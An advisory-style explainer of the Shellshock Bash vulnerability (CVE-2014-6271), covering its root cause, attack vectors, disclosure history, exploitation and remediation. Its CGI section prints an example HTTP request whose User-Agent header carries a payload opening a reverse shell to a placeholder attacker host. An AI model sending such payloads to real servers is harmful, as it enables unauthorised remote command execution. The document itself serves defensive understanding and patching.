CVE-2014-6271

Overview

CVE-2014-6271, nicknamed "Shellshock," is a critical remote code execution vulnerability in the GNU Bash shell, present in all Bash versions through 4.3. Bash allows exporting shell functions to child processes via environment variables; a bug in the parsing code causes Bash to also execute any trailing commands appended after the function definition. Because many network services — web servers running CGI scripts, DHCP clients, SSH with ForceCommand, and others — pass user-controlled data to Bash via environment variables, this parsing flaw allowed unauthenticated remote attackers to execute arbitrary OS commands against these services.

Disclosed September 24, 2014, Shellshock triggered mass exploitation within hours. The initial patch was incomplete, spawning a chain of additional CVEs (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) over the following week. Bash had carried this flaw for approximately 25 years, introduced in Bash version 1.14 circa 1989.

What Is GNU Bash?

GNU Bash (Bourne-Again Shell) is the default command interpreter on virtually every Linux distribution, macOS (through Catalina), and many embedded Unix-based systems. It is used interactively by users and invoked by countless system services, scripts, and network daemons — making any exploitable parsing bug in Bash a high-impact finding with an enormous attack surface.

Affected Versions

All major Linux distributions (RHEL, Ubuntu, Debian, SUSE, CentOS) and macOS (through OS X Mavericks 10.9.5) were affected. Embedded devices running Bash — routers, NAS devices, IP cameras — were often permanently unpatched.

Technical Details

Root Cause: Trailing Command Execution After Function Export

Bash supports exporting functions to child processes via environment variables. The intended syntax is:

env 'FUNC=() { echo hello; }' bash -c 'FUNC'

When a child Bash process starts and encounters an environment variable containing what appears to be a function definition (() { ... }), it imports it as a shell function. The vulnerability is that Bash continues parsing and executing any code that follows the closing brace of the function definition:

env 'FUNC=() { ignored; }; echo SHELLSHOCK' bash -c 'echo test'

This prints SHELLSHOCK — the trailing echo SHELLSHOCK executes during Bash initialization, before the intended command. An attacker who can control an environment variable passed to a Bash subprocess can inject arbitrary shell commands.

Attack Vectors

CGI Scripts (Most Common): Web servers executing CGI scripts pass HTTP headers as environment variables to the script. An attacker sends:

GET /cgi-bin/test.cgi HTTP/1.1
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1

The web server sets HTTP_USER_AGENT to the attacker's string; when the CGI script invokes Bash (directly or via /bin/sh), the trailing command executes as the web server's user — typically www-data or apache.

DHCP Client: A malicious DHCP server can inject commands via DHCP option fields that dhclient passes to Bash hooks. Any device that receives DHCP responses from an untrusted network (a rogue AP, a compromised router) is exploitable.

SSH ForceCommand: SSH servers configured with ForceCommand (restricting users to a specific command) are vulnerable if the shell is Bash — an attacker can still execute arbitrary commands via SSH environment variable injection (SSH_ORIGINAL_COMMAND).

Other vectors: Git hooks, mail delivery agents, various sysadmin utilities that invoke Bash with environment variables.

Why the Initial Patch Was Insufficient

The Bash 4.3 patch 25 (first fix) added a check to reject environment variables containing the () { pattern. However, researchers quickly found ways to bypass it using alternative patterns, leading to CVE-2014-7169 within 24 hours of the original disclosure. A complete fix required multiple iterations across patches 25–27.

Attack Characteristics

Discovery

Stéphane Chazelas, a Unix and Linux system administrator, discovered the vulnerability in September 2014 while investigating Bash's behavior with environment variable function exports. He reported it to Red Hat's security team (Florian Weimer) on September 12, 2014. Red Hat coordinated disclosure with other vendors and CERT/CC. The public disclosure on September 24, 2014 included a coordinated patch release from major Linux distributions — but exploitation began within hours regardless.

Exploitation Context

• Mass exploitation began within hours of disclosure — automated scanning and exploitation tools appeared the same day
• Botnets: Multiple botnets incorporated Shellshock for propagation and payload delivery within days
• Targeted attacks: APT groups including those attributed to China and Iran were observed using Shellshock for initial access in 2014–2015
• Long tail: Embedded devices (routers, NAS, cameras) running outdated Bash remain vulnerable indefinitely; Shellshock exploitation was still observed in threat intelligence reports years after disclosure
• CISA KEV: Added January 28, 2022 — over seven years after disclosure — confirming active exploitation continued through 2021

Remediation

Recommended Actions

1. Update Bash to the fully patched version for your distribution. The initial patch 25 is insufficient; ensure you have patch 26 or 27 (or the equivalent backport). Verify: bash --version and check vendor errata.

2. Disable CGI scripts that invoke Bash if not required. Prefer languages or interpreters that do not use environment variable function import (Python, Perl, PHP).

3. DHCP clients: Ensure dhclient uses a patched Bash version. Consider static IP assignment for systems on untrusted networks.

4. Embedded and IoT devices: Identify all devices running Bash. Apply firmware updates where available; network-isolate devices that cannot be updated.

5. Audit for post-exploitation indicators: Shellshock exploits often install backdoors, cron jobs, or reverse shells. Review CGI access logs for () { patterns; audit crontabs and authorized_keys for unauthorized entries.